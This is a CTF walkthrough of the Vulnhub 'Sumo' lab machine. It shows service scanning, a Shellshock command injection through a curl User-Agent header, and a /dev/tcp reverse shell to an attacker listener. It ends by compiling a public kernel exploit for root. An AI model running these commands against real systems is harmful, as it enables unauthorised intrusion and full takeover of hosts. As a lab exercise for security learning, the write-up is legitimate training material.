Vulnhub - Sumo Writeup

Hi all, let’s pwn this box.

You can find the machine there > Sumo

Let’s start as always with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ip=192.168.1.104
$ nmap -sC -sV -p- -oN nmap.txt $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 22:42 EEST
Nmap scan report for ubuntu.zte.com.cn (192.168.1.104)
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:96:B7:F9 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s enumerate http, i always run gobuster/dirb.

1
2
3
4
5
6
7
8
9
$ gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.txt -o gobuster.txt
/index (Status: 200)
/server-status (Status: 403)
$ dirb http://$ip/ -o dirb.txt                                  
---- Scanning URL: http://192.168.1.104/ ----
+ http://192.168.1.104/cgi-bin/ (CODE:403|SIZE:289)                                    
+ http://192.168.1.104/index (CODE:200|SIZE:177)                                       
+ http://192.168.1.104/index.html (CODE:200|SIZE:177)                                  
+ http://192.168.1.104/server-status (CODE:403|SIZE:294)     

Fucking weird, always hate when that happens haha, but cgi-bin was scratching my mind seems like an exploitation vector for shellshock! Let’s run nikto.

1
2
3
4
$ nikto -host http://$ip/
... junk data ...
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).

Bingo! Let’s exploit it manually. w/ 2 words, shellshock is a code injection attack on bash 4.3 and earlier. We can exploit with msf, or with another tool, but i’ll go the manual way.

1
2
3
$ curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls' http://$ip/cgi-bin/test
test
test.sh

Great, let’s spawn a shell.

1
$ curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/bash -i >& /dev/tcp/$your_ip/5555 0>&1' http://$ip/cgi-bin/test

We have a shell!

1
2
3
4
5
6
7
8
$ nc -lvp 5555
listening on [any] 5555 ...
connect to [$your_ip] from ubuntu.zte.com.cn [192.168.1.104] 49054
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
whoami
www-data

After lot of enumeration i found nothing, so i tried to search for kernel exploits. Let’s check the kernel version.

1
2
$ uname -r
3.2.0-23-generic

Let’s search for an exploit.

1
2
3
4
5
6
$ searchsploit 3.2.0 --exclude="windows|php|hardware"
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'p | linux_x86-64/local/33589.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Pri | linux_x86-64/local/34134.c

First one seems interesting, let’s test it out. I had troubles compile it but i found the solution, if you cant compile it do this :

www-data@ubuntu:/tmp$ export PATH=$PATH:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin

ld PATH was missing.

Let’s compile & run it now.

1
2
3
4
5
6
7
8
9
10
www-data@ubuntu:/tmp$ /usr/bin/gcc 33589.c -O2 -o givemeroot
/usr/bin/gcc 33589.c -O2 -o givemeroot
www-data@ubuntu:/tmp$ ./givemeroot 0
./givemeroot 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
root@ubuntu:~# whoami; id
whoami; id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flag.

1
2
3
root@ubuntu:~# cat /root/root.txt
cat /root/root.txt
{Sum0-SunCSR-2020_r001}

Easy one, See you!